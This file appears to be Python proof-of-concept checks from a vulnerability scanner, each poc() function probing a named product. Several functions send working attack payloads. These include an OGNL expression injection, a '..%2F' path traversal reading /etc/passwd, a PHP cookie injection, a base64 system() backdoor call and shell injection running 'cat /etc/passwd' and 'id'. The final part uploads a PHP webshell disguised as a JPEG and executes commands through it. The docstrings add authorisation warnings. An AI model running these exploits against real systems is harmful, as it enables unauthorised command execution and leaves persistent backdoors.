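def poc(url):
    """Probe an Exchange-style host through /owa and an autodiscover/mapi path.

    Args:
        url: Target host or URL. When no ``http://``/``https://`` scheme is
            present, ``https://`` is prepended before normalisation.

    Returns:
        True when ``/owa`` answers HTTP 200 and the autodiscover probe answers
        HTTP 200 with ``"Exchange"`` in the body; False in every other case,
        including any connection, timeout or TLS error (best-effort scanner).

    Note:
        Certificate verification is disabled on purpose (self-signed
        targets); the response is therefore unauthenticated and an on-path
        attacker could forge a "hit".
    """
    # Only a real scheme counts: a host such as "httpbin.example" must still
    # receive the https:// prefix (the old prefix test matched any "http*").
    if not url.startswith(("http://", "https://")):
        url = "https://" + url
    url = get_standard_url(url)
    try:
        r1 = request.get(url + "/owa",
                         timeout=5,
                         verify=False,
                         allow_redirects=False)
        # Redirects are not followed, so a redirect to a login page counts
        # as "OWA not exposed" and the second request is skipped.
        if r1.status_code != 200:
            return False

        # NOTE(review): "[email protected]" looks like an email-obfuscation
        # artifact of the page this was copied from; confirm the intended
        # literal before relying on this probe.
        r2 = request.get(
            url +
            "/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]",
            timeout=5,
            verify=False,
            allow_redirects=False)
        return r2.status_code == 200 and "Exchange" in r2.text
    except Exception:
        # Network/TLS failures mean "not confirmed", not "crash the scan".
        return False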
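def poc(url):
    """Check whether ``/current_config/passwd`` is served unauthenticated.

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        True when the path answers HTTP 200 and the body contains
        ``"name:passwd"``; False otherwise or on any request error.
    """
    url = get_standard_url(url)
    try:
        r = request.get(f"{url}/current_config/passwd", timeout=10)
    except Exception:
        # A bare ``except:`` also swallowed KeyboardInterrupt/SystemExit and
        # made Ctrl-C unable to stop a scan; only request failures are
        # ignored here.
        return False
    return r.status_code == 200 and "name:passwd" in r.text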
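def poc(url):
    """Report whether ``/debug.php`` is reachable on the target.

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        True when the path answers HTTP 200, False otherwise or on error.

    Note:
        A bare 200 is a weak signal: soft-404 pages and catch-all routes
        also answer 200, so treat a hit as "needs manual confirmation".
    """
    probe = get_standard_url(url) + "/debug.php"
    try:
        resp = request.get(probe, timeout=5)
    except Exception:
        # Bare ``except:`` replaced so Ctrl-C still ends the scan.
        return False
    return resp.status_code == 200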
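def poc(url):
    """Probe ``/mgmt/shared/authn/login`` (an iControl-REST-style login endpoint).

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        The probed URL when the endpoint returns a JSON body that contains
        ``"resterrorresponse"`` or ``"message"``; False otherwise or on any
        error, including a body that is not valid JSON. The HTTP status is
        deliberately not checked (the original behaviour).
    """
    base = get_standard_url(url)
    vuln_url = f"{base}/mgmt/shared/authn/login"
    try:
        r = request.get(vuln_url, verify=False, timeout=5)
        # Parsing is only a validity gate: a login page or WAF block page
        # that happens to contain "message" must not count as a hit.
        json.loads(r.text)
    except Exception:
        return False
    if "resterrorresponse" in r.text or "message" in r.text:
        return vuln_url
    return False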
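def poc(url):
    """Check whether ``graph_realtime.php?action=init`` is served to anonymous users.

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        True when the page answers HTTP 200 and references
        ``poller_realtime.php`` in its body; False otherwise or on any error.
    """
    path = get_standard_url(url) + "/graph_realtime.php?action=init"
    try:
        req = request.get(path, timeout=5)
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt propagates.
        return False
    return req.status_code == 200 and "poller_realtime.php" in req.text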
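def poc(url):
    """POST an expression-language payload to ``doenterpagevariables.action``
    and check whether the server evaluated it.

    The ``queryString`` value wraps ``#{""["class"]}`` (``\\x23`` is ``#``,
    the ``\\u00xx`` sequences are sent literally) between ``aaa``/``bbb``
    markers; a vulnerable server echoes the evaluated class name.

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        True when the response body contains
        ``"aaa{class java.lang.String=null}bbb"``; False otherwise or on any
        request error. Note that TLS verification is left enabled here,
        unlike most sibling checks, so self-signed targets report False.
    """
    target = get_standard_url(url) + "/pages/doenterpagevariables.action"
    params_post = {
        "queryString": "aaa\\u0027+\x23{\\u0022\\u0022[\\u0022class\\u0022]}+\\u0027bbb"}
    headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0",
               "Content-Type": "application/x-www-form-urlencoded"}
    try:
        response = requests.post(target, data=params_post,
                                 headers=headers, timeout=5)
    except Exception:
        # Bare ``except:`` replaced so Ctrl-C still ends the scan.
        return False
    return "aaa{class java.lang.String=null}bbb" in response.text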
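def poc(url):
    """Two-step check: request the module-level ``url_payload`` path, then
    look for ``/secquan.php`` reporting ``"bug exist"``.

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        ``<target>/secquan.php`` when the first request answers HTTP 200 and
        the follow-up body contains ``"bug exist"``; False otherwise or on
        any request error.

    Note:
        The second request only makes sense if the first one created
        ``secquan.php`` on the target (presumably what ``url_payload`` does).
        Nothing here removes that artifact — clean it up after a confirmed
        hit and run this only against systems you are authorised to test.
    """
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    target = get_standard_url(url)
    probe = target + url_payload
    try:
        res = request.get(probe, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code != 200:
            return False
        marker_url = target + "/secquan.php"
        res2 = request.get(marker_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt propagates.
        return False
    if "bug exist" in res2.text:
        return marker_url
    return False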
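def poc(url):
    """Try an encoded ``..%2F`` traversal under ``/public/plugins/<plugin>/``
    for each bundled plugin name and look for ``/etc/passwd`` in the reply.

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        The first plugin URL that answers HTTP 200 with ``"root:x:"`` in the
        body; False when no plugin path leaks the file or every request
        fails. Only Unix-like targets can match this marker.
    """
    plugins = [
        "cloudwatch", "dashlist", "elasticsearch", "graph", "graphite",
        "heatmap", "influxdb", "mysql", "opentsdb", "pluginlist", "postgres",
        "prometheus", "stackdriver", "table", "text"
    ]
    base = get_standard_url(url)
    for plugin in plugins:
        vuln_url = f"{base}/public/plugins/{plugin}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd"
        try:
            r = request.get(vuln_url, verify=False, timeout=5)
        except Exception:
            # One failing plugin path must not abort the others; the bare
            # ``except:`` is narrowed so Ctrl-C still stops the loop.
            continue
        if r.status_code == 200 and "root:x:" in r.text:
            return vuln_url
    return False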
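def poc(url):
    """Inject ``'.phpinfo().'`` through the ``*language*`` cookie of ``/forum.php``
    and check whether PHP evaluated it.

    The cookie name is discovered from the first response's ``Set-Cookie``
    header (split on space, ``=`` and ``,``); the first token containing
    ``"language"`` is reused as the cookie name for the injection request.

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        True when the injected request's body contains ``"PHP Version"``;
        False when no language cookie is set, the marker is absent, or any
        request fails. (Previously the "marker absent" path fell off the end
        and returned None.)
    """
    url = get_standard_url(url) + "/forum.php"
    try:
        first = request.get(url, timeout=5)
        # A missing Set-Cookie header now yields no tokens instead of a
        # KeyError swallowed by the exception handler — same outcome, explicit.
        tokens = re.split(" |=|,", first.headers.get("Set-Cookie", ""))
        lang_fields = [t for t in tokens if "language" in t]
        if not lang_fields:
            return False
        cookie = {lang_fields[0]: "'.phpinfo().'"}
        probe = request.get(url, cookies=cookie, timeout=5)
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt propagates.
        return False
    return "PHP Version" in probe.text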
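def poc(url):
    """Request ``/owa/auth/x.js`` with crafted ``X-BEResource``/``X-AnonResource``
    cookies and check for the server-side error that signals the backend
    honoured them.

    Args:
        url: Target host or URL. When no ``http://``/``https://`` scheme is
            present, ``https://`` is prepended before normalisation.

    Returns:
        The normalised base URL when the reply is HTTP 500 and contains
        ``"NegotiateSecurityContext"``; False otherwise or on any request
        error.
    """
    # Match only a real scheme, not any host name starting with "http".
    if not url.startswith(("http://", "https://")):
        url = "https://" + url
    url = get_standard_url(url)
    vul_url = url + "/owa/auth/x.js"
    headers = {
        'Cookie':
        'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'
    }
    try:
        resp = request.get(vul_url, headers=headers, timeout=5, verify=False)
    except Exception:
        # Connection/TLS failures are "not confirmed", not a crash.
        return False
    if resp.status_code == 500 and 'NegotiateSecurityContext' in resp.text:
        return url
    return False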
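def poc(url):
    """Check for the phpStudy-style backdoor that executes a base64 payload
    carried in the ``Accept-Charset`` header.

    The header value decodes to ``system('echo phpstudy_backdoor_flag');``;
    a backdoored server prints that marker at the very start of the body.

    Args:
        url: Target host or URL. The request goes to the normalised form,
            but the caller's original ``url`` is what gets returned.

    Returns:
        The original ``url`` when the reply is HTTP 200 and the body starts
        with ``"phpstudy_backdoor_flag"``; False otherwise or on any error.
    """
    head = {
        'Accept-Encoding': 'gzip,deflate',
        'Accept-Charset':
        'c3lzdGVtKCdlY2hvIHBocHN0dWR5X2JhY2tkb29yX2ZsYWcnKTs='
    }
    target = get_standard_url(url)
    try:
        res = request.get(url=target,
                          headers=head,
                          timeout=5,
                          allow_redirects=False)
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt propagates.
        return False
    if res.status_code == 200 and res.text.startswith("phpstudy_backdoor_flag"):
        return url
    return False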
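def poc(url):
    """Send a shell-injection body to ``/webadm/?q=moni_detail.do&action=gragh``
    and look for ``/etc/passwd`` content in the reply.

    This is an active test: the payload ``type='|cat /etc/passwd||'`` runs a
    command on a vulnerable target. Use only with authorisation.

    Args:
        url: Target host or URL. When no ``http://``/``https://`` scheme is
            present, ``https://`` is prepended before normalisation.

    Returns:
        True when the reply is HTTP 200 and contains ``"root:x:0:0"``;
        False otherwise or on any request error.
    """
    # Match only a real scheme, not any host name starting with "http".
    if not url.startswith(("http://", "https://")):
        url = "https://" + url
    url = get_standard_url(url)
    vuln_url = url + '/webadm/?q=moni_detail.do&action=gragh'
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = "type='|cat /etc/passwd||'"
    try:
        response1 = requests.post(url=vuln_url,
                                  headers=headers,
                                  data=data,
                                  verify=False,
                                  timeout=5)
    except Exception:
        # Connection/TLS failures are "not confirmed", not a crash.
        return False
    return response1.status_code == 200 and 'root:x:0:0' in response1.text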
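def poc(url):
    """POST every ``data_payload`` to every ``url_payload`` path and report
    the first combination that does not look rejected.

    Uses the module-level ``url_payload1..4`` and ``data_payload1..3``.

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        ``"<url>\\tpayload:<data>"`` for the first HTTP 200 reply whose body
        contains none of ``";</script>"``, ``"Login.jsp"`` or ``"Error"``;
        False when every combination is rejected or fails.

    Note:
        This is a negative-match heuristic (absence of error markers), so a
        catch-all page that answers 200 to anything produces a false
        positive; confirm hits manually.
    """
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    target = get_standard_url(url)
    rejected_markers = (";</script>", "Login.jsp", "Error")
    for url_payload in (url_payload1, url_payload2, url_payload3,
                        url_payload4):
        probe = target + url_payload
        for data_payload in (data_payload1, data_payload2, data_payload3):
            try:
                res = request.post(probe,
                                   data=data_payload,
                                   headers=headers,
                                   timeout=5,
                                   allow_redirects=False)
            except Exception:
                # One failing combination must not abort the rest; bare
                # ``except:`` narrowed so Ctrl-C still stops the loop.
                continue
            if res.status_code == 200 and not any(m in res.text for m in rejected_markers):
                return probe + "\tpayload:" + data_payload
    return False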
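def poc(url):
    """POST the module-level ``payload1``/``payload2`` to ``url_payload`` and
    classify the backend database from which payload succeeded.

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        ``"<target>\\tmssql"`` when the succeeding payload contains
        ``"@@version"``, ``"<target>\\toracle"`` otherwise; False when neither
        payload produces the success marker or every request fails.
        Success means the body contains the (Chinese) marker string below
        and does not contain ``"403"``.
    """
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    target = get_standard_url(url)
    probe = target + url_payload
    for payload in (payload1, payload2):
        try:
            res = request.post(probe,
                               data=payload,
                               headers=headers,
                               timeout=5,
                               allow_redirects=False)
        except Exception:
            # Try the next payload; bare ``except:`` narrowed so Ctrl-C works.
            continue
        if "系统提醒工作流" in res.text and "403" not in res.text:
            # "@@version" is SQL Server syntax; presumably payload1 targets
            # MSSQL and payload2 Oracle — the payloads are defined elsewhere.
            suffix = "\tmssql" if "@@version" in payload else "\toracle"
            return target + suffix
    return False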
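def poc(host, ports=None):
    """Run every service-level check in ``poc_list`` against each IP behind ``host``.

    Each check is looked up by name in ``globals()`` and run in its own
    thread with ``(ip, result)`` or ``(ip, result, ports)`` as arguments;
    the checks are expected to append findings to ``result`` (TODO confirm
    against the individual check functions).

    Args:
        host: Target host or URL; resolved to one or more IPs via ``url2ip``.
        ports: Optional port list forwarded to each check. ``None`` (the new
            default) and an empty list behave identically, as before; the
            old mutable default ``[]`` is gone.

    Returns:
        The shared ``result`` list. Previously the function returned after
        the first IP only (the ``return`` sat inside the loop, and the
        accumulated thread list could not have been restarted anyway); now
        every resolved IP is scanned and an unresolvable host yields ``[]``
        instead of ``None``.
    """
    host = get_standard_url(host)
    targets = url2ip(host)
    result = []
    # Names must match the check functions defined at module level
    # ("genkins" included — it is the function's actual name).
    poc_list = ['redis', 'mongo', 'genkins', 'memcached', 'jboss', 'zookeeper', 'rsync', 'couchdb',
                'elasticsearch', 'hadoop', 'jupyter', 'docker', 'ftp']
    for ip in targets:
        args = (ip, result, ports) if ports else (ip, result)
        # Fresh threads per IP: a Thread object can only be started once.
        workers = [threading.Thread(target=globals()[p], args=args) for p in poc_list]
        for t in workers:
            t.start()
        for t in workers:
            t.join()
    return result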
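def poc(url):
    """Ask ``/mgmt/tm/util/bash`` to run ``id`` with an empty
    ``X-F5-Auth-Token`` and throwaway Basic credentials.

    The Basic header decodes to ``admin:ASasS``; presumably the point of the
    test is that the token header, not the password, is what the endpoint
    checks. This is an active test — a vulnerable device executes ``id``.
    Use only with authorisation.

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        True when the reply is HTTP 200 and contains ``"commandResult"``;
        False otherwise or on any request error. The previous version
        printed the exception to stdout; that debug output is dropped so
        network noise does not pollute scan results, matching the sibling
        checks.
    """
    path = get_standard_url(url) + "/mgmt/tm/util/bash"
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0',
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M='
    }
    data = json.dumps({'command': 'run', 'utilCmdArgs': '-c id'})
    try:
        r = request.post(url=path,
                         data=data,
                         headers=headers,
                         verify=False,
                         timeout=5)
    except Exception:
        return False
    return r.status_code == 200 and 'commandResult' in r.text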
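def poc(url):
    """Delegate the yapi check to ``attack_yapi`` with a dedicated session.

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        Whatever ``attack_yapi(url).verify_yapi(session)`` returns.
    """
    attack = attack_yapi(get_standard_url(url))
    # Close the session's pooled connections when done instead of leaking
    # them until garbage collection.
    with requests.Session() as session:
        return attack.verify_yapi(session)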
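def _im_headers(content_type):
    """Browser-like headers shared by both requests; only Content-Type differs."""
    return {
        "User-Agent":
        "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
        "Accept":
        "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        # Spoofed loopback origin; presumably the upload endpoint trusts it.
        "X-Forwarded-For": "127.0.0.1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Content-Type": content_type,
    }


def _upload_probe_shell(base):
    """Upload the PHP probe through ``/ispirit/im/upload.php``.

    The multipart body carries a PHP file that runs ``$_POST['f']`` via
    ``cmd /c`` (WScript.Shell), i.e. a webshell. It is stored on the
    target and NOT removed by this code.

    Returns:
        The server-assigned name captured from ``2003_<name>|`` in the
        reply, or ``""`` when the pattern is absent.
    """
    headers = _im_headers(
        "multipart/form-data; boundary=---------------------------27723940316706158781839860668")
    data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"
    result = request.post(base + '/ispirit/im/upload.php',
                          headers=headers,
                          data=data,
                          timeout=5,
                          verify=False)
    # Raw string: "\|" in a non-raw literal is an invalid escape (warning on
    # recent Pythons) that happened to yield the same pattern.
    return "".join(re.findall(r"2003_(.+?)\|", result.text))


def _invoke_probe_shell(base, name):
    """Include the uploaded file through ``/ispirit/interface/gateway.php``
    and run ``echo fffhhh`` through it.

    Returns:
        True when the reply is HTTP 200 and echoes ``fffhhh``.
    """
    headers = _im_headers("application/x-www-form-urlencoded")
    # NOTE(review): the "2003" directory is hard-coded in both the regex and
    # this path; it looks like a year/month bucket that may not match every
    # deployment — confirm against the target's attach layout.
    data = {
        "json":
        "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" %
        (name),
        "f":
        "echo fffhhh"
    }
    result = request.post(base + '/ispirit/interface/gateway.php',
                          headers=headers,
                          data=data,
                          timeout=5,
                          verify=False)
    return result.status_code == 200 and 'fffhhh' in result.text


def poc(url):
    """Upload a PHP webshell via the IM attachment endpoint, then include it
    through the gateway and check that a command runs.

    This is an active, artifact-leaving test: the uploaded ``<name>.f.jpg``
    stays under ``attach/im/2003/`` on the target. Use only with
    authorisation and remove the file after a confirmed hit.

    Args:
        url: Target host or URL, normalised through ``get_standard_url``.

    Returns:
        The normalised base URL when the echoed marker ``fffhhh`` comes back
        with HTTP 200; False otherwise, including when the upload reply
        carries no ``2003_<name>|`` token (the second request is then
        skipped — it could not reference a file) and on any request error
        (previously that path fell off the end and returned None).
    """
    try:
        base = get_standard_url(url)
        name = _upload_probe_shell(base)
        if not name:
            return False
        return base if _invoke_probe_shell(base, name) else False
    except Exception:
        return False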